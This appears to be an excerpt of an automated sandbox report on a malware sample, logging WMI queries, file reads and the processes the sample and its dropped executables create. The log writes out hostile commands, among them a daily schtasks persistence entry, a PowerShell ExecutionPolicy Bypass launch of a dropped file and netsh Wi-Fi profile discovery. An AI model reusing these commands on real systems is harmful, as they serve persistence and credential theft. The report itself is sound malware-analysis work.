Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Desktop\xj40xovMsm.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\relog.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: tmp835C.tmp.dat.9.dr, tmpA679.tmp.dat.39.dr, tmpA321.tmp.dat.10.dr, tmp7708.tmp.dat.6.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: xj40xovMsm.exe	ReversingLabs: Detection: 70%
Source: xj40xovMsm.exe	Virustotal: Detection: 36%

Source: xj40xovMsm.exe

String found in binary or memory: ComboBox2-START

Source: C:\Users\user\Desktop\xj40xovMsm.exe

File read: C:\Users\user\Desktop\xj40xovMsm.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\xj40xovMsm.exe "C:\Users\user\Desktop\xj40xovMsm.exe"
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe "C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe "C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe"
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe "C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe "C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe"
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe "C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 7
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe "C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe "C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe "C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe"
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Desktop\xj40xovMsm.exe "C:\Users\user\Desktop\xj40xovMsm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\jqnnpe.exe "C:\Users\user\AppData\Local\Temp\jqnnpe.exe"
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Process created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe "C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe "C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe"	Jump to behavior
